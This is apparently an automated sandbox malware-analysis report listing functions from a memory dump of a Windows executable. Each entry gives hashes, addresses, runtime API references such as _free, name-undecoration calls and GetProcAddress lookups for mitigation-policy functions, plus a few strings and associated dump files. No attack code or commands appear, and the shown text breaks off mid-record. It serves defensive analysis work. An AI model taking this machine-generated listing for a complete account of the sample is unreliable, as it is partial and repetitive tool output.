Opcode ID: f6f5fd968821e7daf89a48bff82c6922736bdde23653975d96473b25cf506b23
Instruction ID: f0edfdc8cca38236ae0dbacff471f3375b6be143fe20a7b57253ff89e0f84a01
Opcode Fuzzy Hash: f6f5fd968821e7daf89a48bff82c6922736bdde23653975d96473b25cf506b23
Instruction Fuzzy Hash: 5831F5B39606269FD300DF65DCC853573A2EBC6314F9E0639DA80177A1C638BC02D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0046B48F, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac0e709ade082c9e0a983b88f52172e8e6af3f95887eac544f46244b73bddfdd
Instruction ID: 989ff05ffed29446478780b0dba6406b7849869f3c27461c905faff05f3accf7
Opcode Fuzzy Hash: ac0e709ade082c9e0a983b88f52172e8e6af3f95887eac544f46244b73bddfdd
Instruction Fuzzy Hash: 6A11C663F30C355B675C816D8C132BAA5D6EBD824030F433ED826E7284F9A4EE23D290

Uniqueness

Uniqueness Score: -1.00%

Function 004514A0, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 8349b7ce84d448d59c288df961bdbdb9080e7d376eafc641e5f2b32a740ebc5f
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 0D11387720008253D6148A6DD8F4BB7A395EAC732372C536BC8434B776E23AA94D9508

Uniqueness

Uniqueness Score: -1.00%

Function 00402210, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced8329c3201529b2242bb169cc670fb01e769df76d6e02a249f44d8d7526f55
Instruction ID: 57ba31277957ba8c83cb0af05903de52457a844d2001c33b4947f6d28e27ce3e
Opcode Fuzzy Hash: ced8329c3201529b2242bb169cc670fb01e769df76d6e02a249f44d8d7526f55
Instruction Fuzzy Hash: 56114C32A145335BCB248F29CCF057EB391EB84245F45427FDD87676C0D5B8984293D8

Uniqueness

Uniqueness Score: -1.00%

Function 004024F2, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6058a4b38ad7490983b76713b69c4818e33ef176ed992bb0075fd3148e22316
Instruction ID: 04eb5dc2b2a52f8b2a2fd3f4dec440abb77c0ef20ea853696a07ef4ecbd7e2bc
Opcode Fuzzy Hash: e6058a4b38ad7490983b76713b69c4818e33ef176ed992bb0075fd3148e22316
Instruction Fuzzy Hash: 30012632A145335BCB248F29DCF043AB791EB84205B45827FED87676C0C6B8A80297D8

Uniqueness

Uniqueness Score: -1.00%

Function 00434891, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cd540caa0ae95f10c3671c1784179da8313daeac5e74dc65a19d291c710683a
Instruction ID: 85f0f95dde7e179573dbb444ef77ab66a9b6b736021777e5a0b148f124c8973c
Opcode Fuzzy Hash: 0cd540caa0ae95f10c3671c1784179da8313daeac5e74dc65a19d291c710683a
Instruction Fuzzy Hash: F0019E36A041869FD719DB68D884AEAF7E5FF89310F1851AAD4449B601D338FD80C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 0046619E, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af534416b12447144daef5251b147f93bf4e7e5c449d181e3c92ebd89fac7c41
Instruction ID: e3ebecf33760454ff9077eb3f5a6b542e7ee1461e971ab81d6fd7c2c11bba770
Opcode Fuzzy Hash: af534416b12447144daef5251b147f93bf4e7e5c449d181e3c92ebd89fac7c41
Instruction Fuzzy Hash: 63E08CB2A11228EBCB15DB9EC94498EF3ECEB46B04B12049BF501D3201D278DE00C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0FC, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef86a220e0a104410a2f354cd8f4252327fd74a408a276142dd6bd78dd756195
Instruction ID: 389838a62e30632498ca6c7fd564feb63cf5af9511d54e1f54203ddf24563384
Opcode Fuzzy Hash: ef86a220e0a104410a2f354cd8f4252327fd74a408a276142dd6bd78dd756195
Instruction Fuzzy Hash: A2A002EF21D1052EF75841497D81F3B439CD3C4775E30C26FF0088518465069E19103C

Uniqueness

Uniqueness Score: -1.00%

Function 00456B0A, Relevance: 37.2, APIs: 19, Strings: 2, Instructions: 490COMMON

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00456B6E
DName::operator+.LIBCMT ref: 00456B9D
DName::DName.LIBVCRUNTIME ref: 00456CA6
shared_ptr.LIBCMT ref: 00456E32
DName::operator+.LIBCMT ref: 00456E4A
shared_ptr.LIBCMT ref: 00456E74
UnDecorator::getSignedDimension.LIBCMT ref: 00456EC1
DName::operator+.LIBCMT ref: 00456ECF
UnDecorator::getSignedDimension.LIBCMT ref: 00456EE1
DName::operator+.LIBCMT ref: 00456EEF
UnDecorator::getSignedDimension.LIBCMT ref: 00456F01
DName::operator+.LIBCMT ref: 00456F0F
DName::operator+.LIBCMT ref: 00456F31
DName::operator+.LIBCMT ref: 00456F47
DName::operator+.LIBCMT ref: 00456F7E
DName::operator+.LIBCMT ref: 00456FD1
shared_ptr.LIBCMT ref: 00457135

Strings

p{E, xrefs: 00456B16
K, xrefs: 00456B7C

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$shared_ptr$Decorator::getDimensionSigned$NameName::
String ID: p{E$K
API String ID: 800913594-1953344705
Opcode ID: 0cdf994fbb5ebc437ab1f7c8ef5a6619cd1952e54cc165c27e03bbda318196d4
Instruction ID: c36313ad01dc4195ea89fce6a2366846d966efd625523d307e1bd22a68766499
Opcode Fuzzy Hash: 0cdf994fbb5ebc437ab1f7c8ef5a6619cd1952e54cc165c27e03bbda318196d4
Instruction Fuzzy Hash: 7612F3B09041199FCF04DFA1D8859FEBBB8EF04346F50446BE801AB253D739AA4ECB59

Uniqueness

Uniqueness Score: -1.00%

Function 0045CAC0, Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045CB2F
_free.LIBCMT ref: 0045CB45
_free.LIBCMT ref: 0045CB58
_free.LIBCMT ref: 0045CB6D
_free.LIBCMT ref: 0045CB82
GetCPInfo.KERNEL32(?,?), ref: 0045CBCC

Part of subcall function 0046474F: _free.LIBCMT ref: 004647BA

_free.LIBCMT ref: 0045CE37
_free.LIBCMT ref: 0045CE4A
_free.LIBCMT ref: 0045CE58
_free.LIBCMT ref: 0045CE63
_free.LIBCMT ref: 0045CEA5
_free.LIBCMT ref: 0045CEAD
_free.LIBCMT ref: 0045CEB3
_free.LIBCMT ref: 0045CEBB
_free.LIBCMT ref: 0045CEC9

Strings

HL, xrefs: 0045CEFE
~`|+, xrefs: 0045CAC8

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID: HL$~`|+
API String ID: 2509303402-2616248729
Opcode ID: 3b4f5b74908de84f8a918f5a471f95097a8e66e36ab8d6f223aacccf2be6b1a6
Instruction ID: e44d2c7b7391f7f465bdd8a93478b02720c09a06b5886f069af6f2c7043a94f3
Opcode Fuzzy Hash: 3b4f5b74908de84f8a918f5a471f95097a8e66e36ab8d6f223aacccf2be6b1a6
Instruction Fuzzy Hash: E9D18D719003059FDB11DFA9C881BEEBBF5BF48305F14412EE899A7342D779A849CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00456538, Relevance: 28.8, APIs: 19, Instructions: 340COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 004565FF
DName::operator+.LIBCMT ref: 0045663C
DName::DName.LIBVCRUNTIME ref: 00456650
DName::operator+.LIBCMT ref: 0045665F
DName::operator+.LIBCMT ref: 004566ED
DName::operator|=.LIBCMT ref: 00456709
DName::DName.LIBVCRUNTIME ref: 00456715
DName::operator+.LIBCMT ref: 00456723
DName::operator+.LIBCMT ref: 0045675D
DName::operator+.LIBCMT ref: 0045679E
UnDecorator::getReturnType.LIBCMT ref: 004567CE
operator+.LIBVCRUNTIME ref: 004568DB

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
String ID:
API String ID: 1186856153-0
Opcode ID: edfaa547e2b85abd5f06b194d56436111ce3fd5610c5ac30c5de18e80f842d07
Instruction ID: 334f2212d34b4fa4efe928760d5630cba0cfbb477c059e4005c41f18e8d51e32
Opcode Fuzzy Hash: edfaa547e2b85abd5f06b194d56436111ce3fd5610c5ac30c5de18e80f842d07
Instruction Fuzzy Hash: 5BC1A3B1900208AFCB04EF94D895EEE77F4EB08346F54406FF90597293DB38AA49CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00457768, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 301COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 004577D3
DName::operator+.LIBCMT ref: 00457909

Part of subcall function 00453B9A: shared_ptr.LIBCMT ref: 00453BB6

DName::operator+.LIBCMT ref: 00457955
DName::operator+.LIBCMT ref: 00457964
DName::operator+.LIBCMT ref: 004578BF

Part of subcall function 00458CF9: DName::operator=.LIBVCRUNTIME ref: 00458D88

DName::operator+.LIBCMT ref: 00457A91
DName::operator=.LIBVCRUNTIME ref: 00457AD1
DName::DName.LIBVCRUNTIME ref: 00457AE9
DName::operator+.LIBCMT ref: 00457AF8
DName::operator+.LIBCMT ref: 00457B04

Part of subcall function 00458CF9: Replicator::operator[].LIBVCRUNTIME ref: 00458D36

Strings

p{E, xrefs: 00457773, 004577CC, 004577E7, 0045795A, 0045799D, 00457A30, 00457A8D, 00457AFD
p{E, xrefs: 004578E9, 004578B1, 004578B4, 004578EC

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID: p{E$p{E
API String ID: 1026175760-825122933
Opcode ID: 23b92b60017c6cef34b9365de0af4d6a80c5576388583662ee7d4e9897944950
Instruction ID: 98ce196355de9e39b753064c0523449dad0f2fe97bad2a4ee657e24f0cfae5c7
Opcode Fuzzy Hash: 23b92b60017c6cef34b9365de0af4d6a80c5576388583662ee7d4e9897944950
Instruction Fuzzy Hash: 4FC1D6B19042049FDB14DFA4D844BEEB7F4AB04306F14446FE949A7283EB79AA4DCF58

Uniqueness

Uniqueness Score: -1.00%

Function 004581C5, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 281COMMON

Download Yara Rule

APIs

UnDecorator::getSignedDimension.LIBCMT ref: 0045823E
UnDecorator::getSignedDimension.LIBCMT ref: 0045824A
DName::operator+.LIBCMT ref: 004582B6
DName::operator+.LIBCMT ref: 004582C5
UnDecorator::getSignedDimension.LIBCMT ref: 00458327
DName::DName.LIBVCRUNTIME ref: 0045833B
UnDecorator::getSignedDimension.LIBCMT ref: 004583A3
UnDecorator::getSignedDimension.LIBCMT ref: 004583C3
UnDecorator::getSignedDimension.LIBCMT ref: 004583E3
DName::operator+.LIBCMT ref: 004583F8

Strings

., xrefs: 00458294
., xrefs: 0045828E
~`|+, xrefs: 004581CE

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::
String ID: .$.$~`|+
API String ID: 3679549980-1472891957
Opcode ID: dc027d238a8a3175694e4fe00f57ebfdddd3efaa4f64a3050b56a2dea8180f0c
Instruction ID: 835bd94cb2947b586ad2da3d210419854de42870008d503f8e152371215d2993
Opcode Fuzzy Hash: dc027d238a8a3175694e4fe00f57ebfdddd3efaa4f64a3050b56a2dea8180f0c
Instruction Fuzzy Hash: 91A1E3729041189ADB25EBB5CC89BEE7B78AB14306F10406FE905A7183EF7C5A4CCF19

Uniqueness

Uniqueness Score: -1.00%

Function 004A0FA6, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 234COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A1239

Strings

pEvents, xrefs: 004A1231

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pEvents
API String ID: 2141394445-2498624650
Opcode ID: aff953ff5c0905635cc6ea6b0ea3002bdef04db5975fcdba2417b58e412ffd8a
Instruction ID: b8af39af58915fefd32750b8178c7c5ba1cc42c0c3825191dd6a949e9be6fe2f
Opcode Fuzzy Hash: aff953ff5c0905635cc6ea6b0ea3002bdef04db5975fcdba2417b58e412ffd8a
Instruction Fuzzy Hash: EC81AE31D002599FDF24DFA8C981BEEB7B0AF66314F14405BE501B72A1DB38AD46CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00468101, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00468145

Part of subcall function 0046739D: _free.LIBCMT ref: 004673BA
Part of subcall function 0046739D: _free.LIBCMT ref: 004673CC
Part of subcall function 0046739D: _free.LIBCMT ref: 004673DE
Part of subcall function 0046739D: _free.LIBCMT ref: 004673F0
Part of subcall function 0046739D: _free.LIBCMT ref: 00467402
Part of subcall function 0046739D: _free.LIBCMT ref: 00467414
Part of subcall function 0046739D: _free.LIBCMT ref: 00467426
Part of subcall function 0046739D: _free.LIBCMT ref: 00467438
Part of subcall function 0046739D: _free.LIBCMT ref: 0046744A
Part of subcall function 0046739D: _free.LIBCMT ref: 0046745C
Part of subcall function 0046739D: _free.LIBCMT ref: 0046746E
Part of subcall function 0046739D: _free.LIBCMT ref: 00467480
Part of subcall function 0046739D: _free.LIBCMT ref: 00467492

_free.LIBCMT ref: 0046813A

Part of subcall function 00460DBA: HeapFree.KERNEL32(00000000,00000000,?,00467AF9,?,00000000,?,?,?,00467D9C,?,00000007,?,?,00468298,?), ref: 00460DD0
Part of subcall function 00460DBA: GetLastError.KERNEL32(?,?,00467AF9,?,00000000,?,?,?,00467D9C,?,00000007,?,?,00468298,?,?), ref: 00460DE2

_free.LIBCMT ref: 0046815C
_free.LIBCMT ref: 00468171
_free.LIBCMT ref: 0046817C
_free.LIBCMT ref: 0046819E
_free.LIBCMT ref: 004681B1
_free.LIBCMT ref: 004681BF
_free.LIBCMT ref: 004681CA
_free.LIBCMT ref: 00468202
_free.LIBCMT ref: 00468209
_free.LIBCMT ref: 00468226
_free.LIBCMT ref: 0046823E

Strings

xBO, xrefs: 004681ED

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: xBO
API String ID: 161543041-2173669756
Opcode ID: c7d0151858404c595b6c8be20916253bb36b4b65b6f73e798d69cc99ffc05565
Instruction ID: 8838c2118588e8c1d8e3c9896014272c0965b4c5a8d44fd51266ad742c173338
Opcode Fuzzy Hash: c7d0151858404c595b6c8be20916253bb36b4b65b6f73e798d69cc99ffc05565
Instruction Fuzzy Hash: 44315D716007049FDB206AB9D805B9B73EAFB01354F14461FE499D7251EF78BC81861A

Uniqueness

Uniqueness Score: -1.00%

Function 004234E0, Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 105libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0042B1B0: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0042354A,kernel32.dll,0000000C,2B7C607E), ref: 0042B1CE
Part of subcall function 0042B1B0: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00000000,00000800,00000000,?,?,00000001,?,?,?,?), ref: 0042B1F0

GetProcAddress.KERNEL32(00000000,SetProcessUserModeExceptionPolicy,kernel32.dll,0000000C,2B7C607E), ref: 004235AC
GetProcAddress.KERNEL32(GetProcessUserModeExceptionPolicy), ref: 004235C2
GetProcAddress.KERNEL32(SetDefaultDllDirectories), ref: 004235D8
GetProcAddress.KERNEL32(SetProcessMitigationPolicy), ref: 004235EE
GetProcAddress.KERNEL32(GetProcessMitigationPolicy), ref: 00423604
GetProcAddress.KERNEL32(InstallELAMCertificateInfo), ref: 0042361A

Strings

InstallELAMCertificateInfo, xrefs: 0042360A
GetProcessUserModeExceptionPolicy, xrefs: 004235B2
GetProcessMitigationPolicy, xrefs: 004235F4
SetDefaultDllDirectories, xrefs: 004235C8
SetProcessMitigationPolicy, xrefs: 004235DE
SetProcessUserModeExceptionPolicy, xrefs: 004235A6
kernel32.dll, xrefs: 00423522
~`|+, xrefs: 004234F4

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetProcessMitigationPolicy$GetProcessUserModeExceptionPolicy$InstallELAMCertificateInfo$SetDefaultDllDirectories$SetProcessMitigationPolicy$SetProcessUserModeExceptionPolicy$kernel32.dll$~`|+
API String ID: 2238633743-4184509080
Opcode ID: 6d488cc45451da10b6d15d00551256477bbdad88d6ae4bb3133be19e0b2e9324
Instruction ID: d796878973a1b2fc3d29148fbde81214154b8ec0a3c508de09f0a62e1e7cf321
Opcode Fuzzy Hash: 6d488cc45451da10b6d15d00551256477bbdad88d6ae4bb3133be19e0b2e9324
Instruction Fuzzy Hash: 49319371A00308AFDB10DFA5ED99BAE7BB4FB48719F20052AF901A3390D7795554CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00458CF9, Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 173COMMON

Download Yara Rule

APIs

Replicator::operator[].LIBVCRUNTIME ref: 00458D36
DName::operator=.LIBVCRUNTIME ref: 00458D88

Strings

@, xrefs: 00458E9E
~E, xrefs: 00458EE5
)]E, xrefs: 00458D8D
)]E, xrefs: 00458E42
generic-type-, xrefs: 00458DC1
template-parameter-, xrefs: 00458D9A
~`|+, xrefs: 00458CFF

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

